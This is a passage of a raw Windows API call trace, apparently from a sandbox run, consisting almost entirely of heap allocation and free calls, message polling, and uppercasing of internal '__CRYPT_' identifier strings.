dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0149.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0149.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0149.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0149.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0149.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0149.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0149.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0149.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0149.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0149.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0149.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0149.885] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0149.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0149.885] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0149.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0149.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0149.886] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0149.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0149.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0149.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0149.886] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0149.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0149.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0149.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0149.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0149.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0149.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0149.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0149.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0149.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0149.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0149.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0149.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0149.886] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0149.886] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0149.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0149.887] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0149.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0149.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0149.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0149.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0149.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0149.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0149.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0149.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0149.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0149.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0149.887] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0149.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0149.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0149.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0149.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0149.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0149.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0149.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0149.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0149.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0149.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0149.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0149.889] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0149.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0149.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0149.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0149.890] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0149.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0149.890] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0149.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0149.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0149.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0149.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0149.890] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0149.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0149.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0149.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0149.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0149.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0149.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0149.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0149.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0149.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0149.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0149.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0149.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0149.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0149.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0149.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0149.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0149.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0149.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0149.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0149.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0149.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0149.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0149.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0149.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0149.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0149.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0149.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0149.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0149.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0149.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0149.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0149.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0149.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0149.892] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0149.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0149.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0149.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0149.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0149.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0149.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0149.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0149.892] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0149.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0149.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0149.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0149.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0149.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0149.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0149.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0149.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0149.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0149.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0149.893] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0149.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0149.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0149.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0149.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0149.893] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0149.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0149.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0149.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0149.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0149.893] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0149.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0149.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0149.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0149.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0149.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0149.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0149.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0149.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0149.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0149.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0149.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0149.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0149.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0149.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0149.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0149.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0149.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0149.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0149.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0149.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0149.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0149.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0149.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0149.894] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0149.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0149.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0149.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0149.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0149.894] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0149.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0149.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0149.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0149.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0149.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0149.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0149.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0149.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0149.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0149.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0149.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0149.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0149.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0149.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0149.895] RtlAllocateHeap (HeapHandle=0x970000, 